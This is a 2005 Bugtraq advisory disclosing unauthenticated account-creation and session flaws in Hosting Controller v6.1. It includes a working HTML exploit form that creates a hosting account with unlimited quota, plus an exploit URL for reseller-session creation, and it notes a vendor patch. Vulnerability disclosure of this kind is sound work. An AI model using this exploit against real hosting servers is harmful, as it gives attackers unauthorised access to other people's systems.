Home page logo
/

bugtraq logo Bugtraq mailing list archives

Bug Hosting Controller New (v6.1 - Hotfix 2.1)
From: kehieuhoc () yahoo com
Date: 11 Jul 2005 08:46:47 -0000

-= KeHieuHoc – HCE GROUP =-

Information
-------------------------
Software Package : Hosting Controller

Vendor Homepage : http://www.hostingcontroller.com

Platforms : Windows based servers

Vulnerability : Multiple Unauthenticated information disclose

Risk : high

Vulnerable Versions: All version ( Tested on: v.6.1 Hotfix 2.1 )

Vendor Contacted : 09/07/2005

Release Date: : 11/07/2005



Summary

------------

Hosting Controller is a complete array of Web hosting automation tools for

the Windows Server family platform.

(I)

You can create new account on Hosting Controller

Exploit :

http://[target]/admin/hosting/addsubsite_online.asp

Code Form:

<FORM action="http://[target]/admin/hosting/addsubsite_online.asp"; method="post">
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain: <INPUT name="DomainName" value="hcegroup.net" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="kehieuhoc" id="Hidden3"><BR>
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
<INPUT type="hidden" name="htype" value="27" id="htype5" >
<INPUT type="hidden" name="choice" value="1" id="Hidden6" >
Password: <INPUT name="password" value="kehieuhoc" id="Hidden7"><BR><BR>
<input type="submit" value="Make">
</FORM> 



(II)

 You can create any “session” which it is special for owner system

Exploit :

http://[target]/admin/hosting/dsp_newreseller.asp


(I) and (II) -> have fun 

 
 


Solution

----------



The vender was notified, they have released a patch.

Update Your software



Credits

---------

Discovered on 9 July 2005 by KeHieuHoc – HCE Group


Email: kehieuhoc () yahoo com

 

References

-------------



http://hcegroup.net

 

------------------------------ //  KeHieuHoc – HCE Group \\ ------------------------------


  By Date           By Thread  

Current thread:
  • Bug Hosting Controller New (v6.1 - Hotfix 2.1) kehieuhoc (Jul 11)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault